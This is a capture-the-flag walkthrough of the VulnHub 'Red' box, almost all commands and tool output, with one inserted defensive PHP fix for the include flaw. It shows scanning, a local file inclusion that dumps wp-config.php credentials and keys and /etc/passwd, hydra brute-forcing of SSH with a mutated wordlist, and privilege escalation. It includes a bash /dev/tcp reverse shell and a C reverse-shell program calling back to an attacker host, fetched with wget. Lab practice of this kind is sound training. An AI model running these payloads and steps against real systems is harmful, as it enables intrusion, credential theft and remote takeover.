VulnHub—Red

$ sudo nmap -sP 192.168.0.1/24
Starting Nmap 7.92 ( https://nmap.org ) at 2022-03-22 02:44 CST
Nmap scan report for 192.168.0.1
Host is up (0.00045s latency).
MAC Address: 24:69:8E:07:FE:4E (Shenzhen Mercury Communication Technologies)
Nmap scan report for 192.168.0.100
Host is up (0.13s latency).
MAC Address: 7A:7D:03:A2:2C:73 (Unknown)
Nmap scan report for 192.168.0.103
Host is up (0.13s latency).
MAC Address: D2:66:41:4A:73:EF (Unknown)
Nmap scan report for 192.168.0.105
Host is up (0.13s latency).
MAC Address: C8:94:02:0F:E5:33 (Chongqing Fugui Electronics)
Nmap scan report for 192.168.0.106
Host is up (0.13s latency).
MAC Address: DA:3F:DF:36:C2:F8 (Unknown)
Nmap scan report for 192.168.0.108
Host is up (0.00056s latency).
MAC Address: 08:00:27:89:06:41 (Oracle VirtualBox virtual NIC)
Nmap scan report for 192.168.0.109
Host is up (0.00079s latency).
MAC Address: E8:6A:64:83:2C:C0 (Lcfc(hefei) Electronics Technology)
Nmap scan report for 192.168.0.101
Host is up.
Nmap done: 256 IP addresses (8 hosts up) scanned in 2.92 seconds
$ sudo nmap -sV -sC -A 192.168.0.108
Starting Nmap 7.92 ( https://nmap.org ) at 2022-03-22 02:44 CST
Nmap scan report for 192.168.0.108
Host is up (0.00045s latency).
Not shown: 998 closed tcp ports (reset)
PORT   STATE SERVICE VERSION
22/tcp open  ssh     OpenSSH 8.2p1 Ubuntu 4ubuntu0.3 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey: 
|   3072 8d:53:65:83:52:52:c4:12:72:49:be:33:5d:d1:e7:1c (RSA)
|   256 06:61:0a:49:86:43:64:ca:b0:0c:0f:09:17:7b:33:ba (ECDSA)
|_  256 9b:8d:90:47:2a:c1:dc:11:28:7d:57:e0:8a:23:b4:69 (ED25519)
80/tcp open  http    Apache httpd 2.4.41 ((Ubuntu))
| http-robots.txt: 1 disallowed entry 
|_/wp-admin/
|_http-title: Hacked By Red – Your site has been Hacked! You\xE2\x80\x99ll neve...
|_http-generator: WordPress 5.8.1
|_http-server-header: Apache/2.4.41 (Ubuntu)
MAC Address: 08:00:27:89:06:41 (Oracle VirtualBox virtual NIC)
Device type: general purpose
Running: Linux 4.X|5.X
OS CPE: cpe:/o:linux:linux_kernel:4 cpe:/o:linux:linux_kernel:5
OS details: Linux 4.15 - 5.6
Network Distance: 1 hop
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

TRACEROUTE
HOP RTT     ADDRESS
1   0.45 ms 192.168.0.108

OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 9.31 seconds
$ python3 dirsearch.py -e php,txt,zip,html -u 192.168.0.108  -t 40 --exclude-status 403,401

  _|. _ _  _  _  _ _|_    v0.4.2.3
 (_||| _) (/_(_|| (_| )

Extensions: php, txt, zip, html | HTTP method: GET | Threads: 40 | Wordlist size: 10780

Output File: /home/joker/softwares/dirsearch/reports/192.168.0.108_22-03-22_02-46-10.txt

Target: http://192.168.0.108/

[02:46:10] Starting: 
[02:46:13] 301 -    0B  - /%2e%2e//google.com  ->  http://192.168.0.108/%2E%2E/google.com
[02:46:17] 301 -    0B  - /0  ->  http://192.168.0.108/0/
[02:46:19] 301 -    0B  - /Citrix//AccessPlatform/auth/clientscripts/cookies.js  ->  http://192.168.0.108/Citrix/AccessPlatform/auth/clientscripts/cookies.js
[02:46:20] 301 -    0B  - /New%20folder%20(2)  ->  http://192.168.0.108/New%20folder%20(2
[02:46:21] 301 -    0B  - /PMA2/index.php  ->  http://192.168.0.108/PMA2/
[02:46:21] 301 -    0B  - /PMA/index.php  ->  http://192.168.0.108/PMA/
[02:46:25] 301 -    0B  - /adm/index.php  ->  http://192.168.0.108/adm/
[02:46:25] 302 -    0B  - /admin  ->  http://redrocks.win/wp-admin/
[02:46:26] 301 -    0B  - /admin.  ->  http://192.168.0.108/admin
[02:46:26] 302 -    0B  - /admin/  ->  http://redrocks.win/wp-admin/
[02:46:26] 301 -    0B  - /admin/PMA/index.php  ->  http://192.168.0.108/admin/PMA/
[02:46:27] 301 -    0B  - /admin/index.php  ->  http://192.168.0.108/admin/
[02:46:27] 301 -    0B  - /admin/mysql/index.php  ->  http://192.168.0.108/admin/mysql/
[02:46:27] 301 -    0B  - /admin/mysql2/index.php  ->  http://192.168.0.108/admin/mysql2/
[02:46:27] 301 -    0B  - /admin/phpmyadmin2/index.php  ->  http://192.168.0.108/admin/phpmyadmin2/
[02:46:27] 301 -    0B  - /admin/phpMyAdmin/index.php  ->  http://192.168.0.108/admin/phpMyAdmin/
[02:46:27] 301 -    0B  - /admin/phpmyadmin/index.php  ->  http://192.168.0.108/admin/phpmyadmin/
[02:46:27] 301 -    0B  - /admin/pma/index.php  ->  http://192.168.0.108/admin/pma/
[02:46:27] 301 -    0B  - /admin2/index.php  ->  http://192.168.0.108/admin2/
[02:46:28] 301 -    0B  - /admin_area/index.php  ->  http://192.168.0.108/admin_area/
[02:46:30] 301 -    0B  - /adminarea/index.php  ->  http://192.168.0.108/adminarea/
[02:46:30] 301 -    0B  - /admincp/index.php  ->  http://192.168.0.108/admincp/
[02:46:31] 301 -    0B  - /adminer/index.php  ->  http://192.168.0.108/adminer/
[02:46:31] 301 -    0B  - /administrator/index.php  ->  http://192.168.0.108/administrator/
[02:46:33] 301 -    0B  - /apc/index.php  ->  http://192.168.0.108/apc/
[02:46:34] 301 -    0B  - /asset..  ->  http://192.168.0.108/asset
[02:46:34] 301 -    0B  - /atom  ->  http://192.168.0.108/feed/atom/
[02:46:35] 301 -    0B  - /bb-admin/index.php  ->  http://192.168.0.108/bb-admin/
[02:46:35] 301 -    0B  - /bitrix/admin/index.php  ->  http://192.168.0.108/bitrix/admin/
[02:46:37] 301 -    0B  - /claroline/phpMyAdmin/index.php  ->  http://192.168.0.108/claroline/phpMyAdmin/
[02:46:40] 302 -    0B  - /dashboard  ->  http://redrocks.win/wp-admin/
[02:46:40] 302 -    0B  - /dashboard/  ->  http://redrocks.win/wp-admin/
[02:46:40] 301 -    0B  - /db/index.php  ->  http://192.168.0.108/db/
[02:46:40] 301 -    0B  - /dbadmin/index.php  ->  http://192.168.0.108/dbadmin/
[02:46:42] 301 -    0B  - /engine/classes/swfupload//swfupload.swf  ->  http://192.168.0.108/engine/classes/swfupload/swfupload.swf
[02:46:42] 301 -    0B  - /engine/classes/swfupload//swfupload_f9.swf  ->  http://192.168.0.108/engine/classes/swfupload/swfupload_f9.swf
[02:46:42] 301 -    0B  - /etc/lib/pChart2/examples/imageMap/index.php  ->  http://192.168.0.108/etc/lib/pChart2/examples/imageMap/
[02:46:43] 301 -    0B  - /extjs/resources//charts.swf  ->  http://192.168.0.108/extjs/resources/charts.swf
[02:46:43] 302 -    0B  - /favicon.ico  ->  http://redrocks.win/wp-includes/images/w-logo-blue-white-bg.png
[02:46:43] 301 -    0B  - /feed  ->  http://192.168.0.108/feed/
[02:46:45] 301 -    0B  - /html/js/misc/swfupload//swfupload.swf  ->  http://192.168.0.108/html/js/misc/swfupload/swfupload.swf
[02:46:46] 301 -    0B  - /index.php  ->  http://192.168.0.108/
[02:46:46] 301 -    0B  - /index.php/login/  ->  http://192.168.0.108/login/
[02:46:46] 301 -    0B  - /install/index.php?upgrade/  ->  http://192.168.0.108/install/?upgrade/
[02:46:47] 301 -    0B  - /jkstatus;  ->  http://192.168.0.108/jkstatus
[02:46:48] 200 -   19KB - /license.txt
[02:46:49] 302 -    0B  - /login  ->  http://redrocks.win/wp-login.php
[02:46:49] 301 -    0B  - /login.wdm%20  ->  http://192.168.0.108/login.wdm
[02:46:49] 302 -    0B  - /login/  ->  http://redrocks.win/wp-login.php
[02:46:49] 301 -    0B  - /login.wdm%2e  ->  http://192.168.0.108/login.wdm
[02:46:51] 301 -    0B  - /modelsearch/index.php  ->  http://192.168.0.108/modelsearch/
[02:46:52] 301 -    0B  - /myadmin/index.php  ->  http://192.168.0.108/myadmin/
[02:46:52] 301 -    0B  - /myadmin2/index.php  ->  http://192.168.0.108/myadmin2/
[02:46:52] 301 -    0B  - /mysql-admin/index.php  ->  http://192.168.0.108/mysql-admin/
[02:46:52] 301 -    0B  - /mysql/index.php  ->  http://192.168.0.108/mysql/
[02:46:52] 301 -    0B  - /mysqladmin/index.php  ->  http://192.168.0.108/mysqladmin/
[02:46:53] 301 -    0B  - /panel-administracion/index.php  ->  http://192.168.0.108/panel-administracion/
[02:46:55] 301 -    0B  - /phpMyAdmin/index.php  ->  http://192.168.0.108/phpMyAdmin/
[02:46:55] 301 -    0B  - /phpMyAdmin/phpMyAdmin/index.php  ->  http://192.168.0.108/phpMyAdmin/phpMyAdmin/
[02:46:55] 301 -    0B  - /phpMyAdmin.old/index.php  ->  http://192.168.0.108/phpMyAdmin.old/
[02:46:55] 301 -    0B  - /phpMyAdminold/index.php  ->  http://192.168.0.108/phpMyAdminold/
[02:46:55] 301 -    0B  - /phpMyadmin_bak/index.php  ->  http://192.168.0.108/phpMyadmin_bak/
[02:46:55] 301 -    0B  - /phpadmin/index.php  ->  http://192.168.0.108/phpadmin/
[02:46:55] 301 -    0B  - /phpma/index.php  ->  http://192.168.0.108/phpma/
[02:46:55] 301 -    0B  - /phpmyadmin!!  ->  http://192.168.0.108/phpmyadmin
[02:46:55] 301 -    0B  - /phpmyadmin-old/index.php  ->  http://192.168.0.108/phpmyadmin-old/
[02:46:55] 301 -    0B  - /phpmyadmin/phpmyadmin/index.php  ->  http://192.168.0.108/phpmyadmin/phpmyadmin/
[02:46:55] 301 -    0B  - /phpmyadmin0/index.php  ->  http://192.168.0.108/phpmyadmin0/
[02:46:55] 301 -    0B  - /phpmyadmin/index.php  ->  http://192.168.0.108/phpmyadmin/
[02:46:55] 301 -    0B  - /phpmyadmin1/index.php  ->  http://192.168.0.108/phpmyadmin1/
[02:46:55] 301 -    0B  - /phpmyadmin2/index.php  ->  http://192.168.0.108/phpmyadmin2/
[02:46:56] 301 -    0B  - /pma/index.php  ->  http://192.168.0.108/pma/
[02:46:56] 301 -    0B  - /pma-old/index.php  ->  http://192.168.0.108/pma-old/
[02:46:56] 301 -    0B  - /pmamy/index.php  ->  http://192.168.0.108/pmamy/
[02:46:56] 301 -    0B  - /pmamy2/index.php  ->  http://192.168.0.108/pmamy2/
[02:46:56] 301 -    0B  - /pmd/index.php  ->  http://192.168.0.108/pmd/
[02:46:57] 200 -    7KB - /readme.html
[02:46:57] 301 -    0B  - /rating_over.  ->  http://192.168.0.108/rating_over
[02:46:58] 200 -  112B  - /robots.txt
[02:46:58] 301 -    0B  - /roundcube/index.php  ->  http://192.168.0.108/roundcube/
[02:46:58] 301 -    0B  - /rss  ->  http://192.168.0.108/feed/
[02:47:00] 301 -    0B  - /siteadmin/index.php  ->  http://192.168.0.108/siteadmin/
[02:47:00] 302 -    0B  - /sitemap.xml  ->  http://redrocks.win/wp-sitemap.xml
[02:47:01] 301 -    0B  - /sql/index.php  ->  http://192.168.0.108/sql/
[02:47:01] 301 -    0B  - /static..  ->  http://192.168.0.108/static
[02:47:02] 301 -    0B  - /sugarcrm/index.php?module=Accounts&action=ShowDuplicates  ->  http://192.168.0.108/sugarcrm/?module=Accounts&action=ShowDuplicates
[02:47:02] 301 -    0B  - /sugarcrm/index.php?module=Contacts&action=ShowDuplicates  ->  http://192.168.0.108/sugarcrm/?module=Contacts&action=ShowDuplicates
[02:47:03] 301 -    0B  - /templates/beez/index.php  ->  http://192.168.0.108/templates/beez/
[02:47:03] 301 -    0B  - /templates/rhuk_milkyway/index.php  ->  http://192.168.0.108/templates/rhuk_milkyway/
[02:47:03] 301 -    0B  - /templates/ja-helio-farsi/index.php  ->  http://192.168.0.108/templates/ja-helio-farsi/
[02:47:03] 301 -    0B  - /tmp/index.php  ->  http://192.168.0.108/tmp/
[02:47:03] 301 -    0B  - /tools/phpMyAdmin/index.php  ->  http://192.168.0.108/tools/phpMyAdmin/
[02:47:04] 301 -    0B  - /typo3/phpmyadmin/index.php  ->  http://192.168.0.108/typo3/phpmyadmin/
[02:47:06] 301 -    0B  - /web/phpMyAdmin/index.php  ->  http://192.168.0.108/web/phpMyAdmin/
[02:47:06] 301 -    0B  - /webadmin/index.php  ->  http://192.168.0.108/webadmin/
[02:47:06] 301 -  317B  - /wp-admin  ->  http://192.168.0.108/wp-admin/
[02:47:06] 301 -  319B  - /wp-content  ->  http://192.168.0.108/wp-content/
[02:47:06] 200 -    0B  - /wp-content/
[02:47:06] 400 -    1B  - /wp-admin/admin-ajax.php
[02:47:06] 200 -    0B  - /wp-config.php
[02:47:06] 500 -  610B  - /wp-content/plugins/akismet/akismet.php
[02:47:06] 500 -  610B  - /wp-content/plugins/akismet/admin.php
[02:47:06] 500 -    0B  - /wp-content/plugins/hello.php
[02:47:06] 301 -  320B  - /wp-includes  ->  http://192.168.0.108/wp-includes/
[02:47:06] 200 -    0B  - /wp-includes/rss-functions.php
[02:47:06] 301 -    0B  - /wp-content/plugins/adminer/inc/editor/index.php  ->  http://192.168.0.108/wp-content/plugins/adminer/inc/editor/
[02:47:07] 200 -    0B  - /wp-cron.php
[02:47:07] 301 -    0B  - /wp-register.php  ->  http://redrocks.win/wp-login.php?action=register
[02:47:07] 200 -  110KB - /wp-json/
[02:47:07] 200 -  595B  - /wp-json/wp/v2/users/
[02:47:07] 302 -    0B  - /wp-signup.php  ->  http://redrocks.win/wp-login.php?action=register
[02:47:07] 200 -    6KB - /wp-login.php
[02:47:07] 301 -    0B  - /www/phpMyAdmin/index.php  ->  http://192.168.0.108/www/phpMyAdmin/
[02:47:07] 301 -    0B  - /xampp/phpmyadmin/index.php  ->  http://192.168.0.108/xampp/phpmyadmin/
[02:47:07] 302 -    0B  - /wp-admin/  ->  http://redrocks.win/wp-login.php?redirect_to=http%3A%2F%2F192.168.0.108%2Fwp-admin%2F&reauth=1
[02:47:07] 409 -    3KB - /wp-admin/setup-config.php
[02:47:07] 200 -    1KB - /wp-admin/install.php
[02:47:07] 405 -   42B  - /xmlrpc.php

Task Completed
$ sudo vim /etc/hosts
127.0.0.1 localhost
127.0.1.1 kali
192.168.0.108   redrocks.win
$ python3 dirsearch.py -e php,txt,zip,html -u 192.168.0.108  -w /usr/share/seclists/Discovery/Web-Content/CommonBackdoors-PHP.fuzz.txt -t 40 --exclude-status 403,401

  _|. _ _  _  _  _ _|_    v0.4.2.3
 (_||| _) (/_(_|| (_| )

Extensions: php, txt, zip, html | HTTP method: GET | Threads: 40
Wordlist size: 148

Output File: /home/joker/softwares/dirsearch/reports/192.168.0.108_22-03-22_03-09-24.txt

Target: http://192.168.0.108/

[03:09:24] Starting: 
[03:09:26] 500 -    0B  - /NetworkFileManagerPHP.php

Task Completed
$ wfuzz -c  -u 'http://192.168.0.108/NetworkFileManagerPHP.php?FUZZ=ls'  -w /usr/share/seclists/Discovery/Web-Content/burp-parameter-names.txt
/usr/lib/python3/dist-packages/wfuzz/__init__.py:34: UserWarning:Pycurl is not compiled against Openssl. Wfuzz might not work correctly when fuzzing SSL sites. Check Wfuzz's documentation for more information.
********************************************************
* Wfuzz 3.1.0 - The Web Fuzzer                         *
********************************************************

Target: http://192.168.0.108/NetworkFileManagerPHP.php?FUZZ=ls
Total requests: 2588

=====================================================================
ID           Response   Lines    Word       Chars       Payload
=====================================================================

000000026:   200        1 L      0 W        1 Ch        "key"
000000003:   500        0 L      0 W        0 Ch        "page"
000000028:   500        0 L      0 W        0 Ch        "start"
000000015:   500        0 L      0 W        0 Ch        "user"
000000022:   500        0 L      0 W        0 Ch        "mode"
000000023:   500        0 L      0 W        0 Ch        "order"

^C /usr/lib/python3/dist-packages/wfuzz/wfuzz.py:80: UserWarning:Finishing pending requests...

Total time: 150.3562
Processed Requests: 79
Filtered Requests: 0
Requests/sec.: 0.525418
http://192.168.0.108/NetworkFileManagerPHP.php?key=php://filter/read=convert.base64-encode/resource=NetworkFileManagerPHP.php
<?php
   $file = $_GET['key'];
   if(isset($file))
   {
       include("$file");
   }
   else
   {
       include("NetworkFileManagerPHP.php");
   }
   /* That password alone won't help you! Hashcat says rules are rules */
?>
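For contrast with the include("$file") above, this is a hardened version of the same page selector, written here as an added example (it is not code from the original page or from the box); the pages directory and the allowlist of page names are assumptions:

```php
<?php
// Added example, not from the VulnHub box: a hardened replacement for
// include("$file") in NetworkFileManagerPHP.php. Assumes the includable
// pages live under PAGES_DIR and are chosen by a short name, not a path.

declare(strict_types=1);

const PAGES_DIR = __DIR__ . '/pages';             // assumption: allowed includes live here
const ALLOWED_PAGES = ['home', 'list', 'upload'];  // assumption: the only selectable pages

/**
 * Map a user-supplied page name to an absolute path, or return null.
 * The name pattern alone rejects stream wrappers ("php://", "data://"),
 * traversal ("..", "/") and NUL bytes, so a value such as
 * php://filter/read=convert.base64-encode/resource=wp-config.php never
 * reaches include(); the allowlist and realpath() check are belt and braces.
 */
function resolve_page(string $name): ?string
{
    if (!preg_match('/^[a-z0-9_-]{1,32}$/', $name)) {
        return null;
    }
    if (!in_array($name, ALLOWED_PAGES, true)) {
        return null;
    }
    $path = realpath(PAGES_DIR . '/' . $name . '.php');
    $base = realpath(PAGES_DIR);
    // realpath() resolves symlinks; confirm the result still sits inside PAGES_DIR.
    if ($path === false || $base === false
        || strncmp($path, $base . DIRECTORY_SEPARATOR, strlen($base) + 1) !== 0) {
        return null;
    }
    return $path;
}

$page = resolve_page($_GET['key'] ?? 'home');
if ($page === null) {
    http_response_code(400);
    exit('invalid page');
}
include $page;
```

With this in place the php://filter and ../../../etc/passwd requests shown on this page all fail the name pattern and get a 400 instead of a file read.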
http://192.168.0.108/NetworkFileManagerPHP.php?key=php://filter/read=convert.base64-encode/resource=wp-config.php
<?php
/**
 * The base configuration for WordPress
 *
 * The wp-config.php creation script uses this file during the installation.
 * You don't have to use the web site, you can copy this file to "wp-config.php"
 * and fill in the values.
 *
 * This file contains the following configurations:
 *
 * * MySQL settings
 * * Secret keys
 * * Database table prefix
 * * ABSPATH
 *
 * @link https://wordpress.org/support/article/editing-wp-config-php/
 *
 * @package WordPress
 */
// ** MySQL settings - You can get this info from your web host ** //
/** The name of the database for WordPress */
define( 'DB_NAME', 'wordpress' );

/** MySQL database username */
define( 'DB_USER', 'john' );

/** MySQL database password */
define( 'DB_PASSWORD', 'R3v_m4lwh3r3_k1nG!!' );

/** MySQL hostname */
define( 'DB_HOST', 'localhost' );

/** Database Charset to use in creating database tables. */
define( 'DB_CHARSET', 'utf8' );

/** The Database Collate type. Don't change this if in doubt. */
define( 'DB_COLLATE', '' );

define('FS_METHOD', 'direct');

define('WP_SITEURL', 'http://redrocks.win');
define('WP_HOME', 'http://redrocks.win');

/**#@+
 * Authentication unique keys and salts.
 *
 * Change these to different unique phrases! You can generate these using
 * the {@link https://api.wordpress.org/secret-key/1.1/salt/ WordPress.org secret-key service}.
 *
 * You can change these at any point in time to invalidate all existing cookies.
 * This will force all users to have to log in again.
 *
 * @since 2.6.0
 */
define('AUTH_KEY',         '2uuBvc8SO5{>UwQ<^5V5[UHBw%N}-BwWqw|><*HfBwJ( $&%,(Zbg/jwFkRHf~v|');
define('SECURE_AUTH_KEY',  'ah}<I`52GL6C^@~x C9FpMq-)txgOmA<~{R5ktY/@.]dBF?keB3}+Y^u!a54 Xc(');
define('LOGGED_IN_KEY',    '[a!K}D<7-vB3Y&x_<3e]Wd+J]!o+A:U@QUZ-RU1]tO@/N}b}R@+/$+u*pJ|Z(xu-');
define('NONCE_KEY',        ' g4|@~:h,K29D}$FL-f/eujw(VT;8wa7xRWpVR: >},]!Ez.48E:ok 8Ip~5_o+a');
define('AUTH_SALT',        'a;,O<~vbpL+|@W+!Rs1o,T$r9(LwaXI =I7ZW$.Z[+BQ=B6QG7nr+w_bQ6B]5q4c');
define('SECURE_AUTH_SALT', 'GkU:% Lo} 9}w38i:%]=uq&J6Z&RR#v2vsB5a_ +.[us;6mE+|$x*+ D*Ke+:Nt:');
define('LOGGED_IN_SALT',   '#`F9&pm_jY}N3y0&8Z]EeL)z,$39,yFc$Nq`jGOMT_aM*`<$9A:9<Kk^L}fX@+iZ');
define('NONCE_SALT',       'hTlFE*6zlZMbqluz)hf:-:x-:l89fC4otci;38|i`7eU1;+k[!0[ZG.oCt2@-y3X');

/**#@-*/

/**
 * WordPress database table prefix.
 *
 * You can have multiple installations in one database if you give each
 * a unique prefix. Only numbers, letters, and underscores please!
 */
$table_prefix = 'wp_';

/**
 * For developers: WordPress debugging mode.
 *
 * Change this to true to enable the display of notices during development.
 * It is strongly recommended that plugin and theme developers use WP_DEBUG
 * in their development environments.
 *
 * For information on other constants that can be used for debugging,
 * visit the documentation.
 *
 * @link https://wordpress.org/support/article/debugging-in-wordpress/
 */
define( 'WP_DEBUG', false );

/* Add any custom values between this line and the "stop editing" line. */



/* That's all, stop editing! Happy publishing. */

/** Absolute path to the WordPress directory. */
if ( ! defined( 'ABSPATH' ) ) {
 define( 'ABSPATH', __DIR__ . '/' );
}

/** Sets up WordPress vars and included files. */
require_once ABSPATH . 'wp-settings.php';
http://192.168.0.108/NetworkFileManagerPHP.php?key=php://filter/resource=../../../etc/passwd
root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
bin:x:2:2:bin:/bin:/usr/sbin/nologin
sys:x:3:3:sys:/dev:/usr/sbin/nologin
sync:x:4:65534:sync:/bin:/bin/sync
games:x:5:60:games:/usr/games:/usr/sbin/nologin
man:x:6:12:man:/var/cache/man:/usr/sbin/nologin
lp:x:7:7:lp:/var/spool/lpd:/usr/sbin/nologin
mail:x:8:8:mail:/var/mail:/usr/sbin/nologin
news:x:9:9:news:/var/spool/news:/usr/sbin/nologin
uucp:x:10:10:uucp:/var/spool/uucp:/usr/sbin/nologin
proxy:x:13:13:proxy:/bin:/usr/sbin/nologin
www-data:x:33:33:www-data:/var/www:/usr/sbin/nologin
backup:x:34:34:backup:/var/backups:/usr/sbin/nologin
list:x:38:38:Mailing List Manager:/var/list:/usr/sbin/nologin
irc:x:39:39:ircd:/var/run/ircd:/usr/sbin/nologin
gnats:x:41:41:Gnats Bug-Reporting System (admin):/var/lib/gnats:/usr/sbin/nologin
nobody:x:65534:65534:nobody:/nonexistent:/usr/sbin/nologin
systemd-network:x:100:102:systemd Network Management,,,:/run/systemd:/usr/sbin/nologin
systemd-resolve:x:101:103:systemd Resolver,,,:/run/systemd:/usr/sbin/nologin
systemd-timesync:x:102:104:systemd Time Synchronization,,,:/run/systemd:/usr/sbin/nologin
messagebus:x:103:106::/nonexistent:/usr/sbin/nologin
syslog:x:104:110::/home/syslog:/usr/sbin/nologin
_apt:x:105:65534::/nonexistent:/usr/sbin/nologin
tss:x:106:111:TPM software stack,,,:/var/lib/tpm:/bin/false
uuidd:x:107:112::/run/uuidd:/usr/sbin/nologin
tcpdump:x:108:113::/nonexistent:/usr/sbin/nologin
landscape:x:109:115::/var/lib/landscape:/usr/sbin/nologin
pollinate:x:110:1::/var/cache/pollinate:/bin/false
usbmux:x:111:46:usbmux daemon,,,:/var/lib/usbmux:/usr/sbin/nologin
sshd:x:112:65534::/run/sshd:/usr/sbin/nologin
systemd-coredump:x:999:999:systemd Core Dumper:/:/usr/sbin/nologin
john:x:1000:1000:john:/home/john:/bin/bash
lxd:x:998:100::/var/snap/lxd/common/lxd:/bin/false
mysql:x:113:117:MySQL Server,,,:/nonexistent:/bin/false
ippsec:x:1001:1001:,,,:/home/ippsec:/bin/bash
oxdf:x:1002:1002:,,,:/home/oxdf:/bin/bash
$ ./hashcat --stdout ~/test./test.txt -r /usr/share/hashcat/rules/best64.rule > ~/test./passlist.txt
beignet-opencl-icd: no supported GPU found, this is probably the wrong opencl-icd package for this hardware
(If you have multiple ICDs installed and OpenCL works, you can ignore this message)
$ hydra -l john -P ~/test./passlist.txt 192.168.0.104 ssh
Hydra v9.3 (c) 2022 by van Hauser/THC & David Maciejak - Please do not use in military or secret service organizations, or for illegal purposes (this is non-binding, these *** ignore laws and ethics anyway).

Hydra (https://github.com/vanhauser-thc/thc-hydra) starting at 2022-03-22 19:25:22
[WARNING] Many SSH configurations limit the number of parallel tasks, it is recommended to reduce the tasks: use -t 4
[DATA] max 16 tasks per 1 server, overall 16 tasks, 77 login tries (l:1/p:77), ~5 tries per task
[DATA] attacking ssh://192.168.0.104:22/
[22][ssh] host: 192.168.0.104   login: john   password: R3v_m4lwh3r3_k1nG!!6
1 of 1 target successfully completed, 1 valid password found
Hydra (https://github.com/vanhauser-thc/thc-hydra) finished at 2022-03-22 19:26:10
john@red:~$ sudo -u ippsec /usr/bin/time /bin/bash
ippsec@red:/home/john$ cd /dev/shm
ippsec@red:/dev/shm$ ls
ippsec@red:/dev/shm$ cat shell.sh
ippsec@red:/dev/shm$ vi shell.sh 
#! /bin/bash
bash -c 'bash -i >& /dev/tcp/192.168.0.103/2333 0>&1'
ippsec@red:/dev/shm$ chmod +x shell.sh
ippsec@red:/dev/shm$ ./shell.sh
$ nc -lnvp 2333
ippsec@red:/home/john$ python3 -c 'import pty;pty.spawn("/bin/bash")'
ippsec@red:/home/john$ export TERM=xterm
ippsec@red:/home/john$ ^Z
$ stty raw -echo;fg
ippsec@red:/dev/shm$ cd /home/john
ippsec@red:/home/john$ ls
note_from_red.txt
ippsec@red:/home/john$ vi note_from_red.txt 
Having a little trouble with the cat command blue?
ippsec@red:/home/john$ You will never see your way to 0xdf
https://www.revshells.com/
#include <stdio.h>
#include <sys/socket.h>
#include <sys/types.h>
#include <stdlib.h>
#include <unistd.h>
#include <netinet/in.h>
#include <arpa/inet.h>

int main(void){
    int port = 2333;
    struct sockaddr_in revsockaddr;

    int sockt = socket(AF_INET, SOCK_STREAM, 0);
    revsockaddr.sin_family = AF_INET;       
    revsockaddr.sin_port = htons(port);
    revsockaddr.sin_addr.s_addr = inet_addr("192.168.0.103");

    connect(sockt, (struct sockaddr *) &revsockaddr, 
    sizeof(revsockaddr));
    dup2(sockt, 0);
    dup2(sockt, 1);
    dup2(sockt, 2);

    char * const argv[] = {"sh", NULL};
    execve("/bin/bash", argv, NULL);

    return 0;       
}
ippsec@red:/home/john$ cd /var/www/wordpress/.git
ippsec@red:/var/www/wordpress/.git$ rm -r rev 
rm: remove write-protected regular file 'rev'? y
ippsec@red:/var/www/wordpress/.git$ rm -r supersecretfileuc.c 
rm: remove write-protected regular file 'supersecretfileuc.c'? y
ippsec@red:/var/www/wordpress/.git$ wget 192.168.0.103/supersecretfileuc.c
--2022-03-23 02:49:49--  http://192.168.0.106:8000/supersecretfileuc.c
Connecting to 192.168.0.106:8000... connected.
HTTP request sent, awaiting response... 200 OK
Length: 667 [text/x-csrc]
Saving to: ‘supersecretfileuc.c’

supersecretfileuc.c 100%[===================>]     667  --.-KB/s    in 0s      

2022-03-23 02:49:49 (217 MB/s) - ‘supersecretfileuc.c’ saved [667/667]
$ nc -lnvp 1234
ls
root.txt
vi root.txt
GG Blue, GG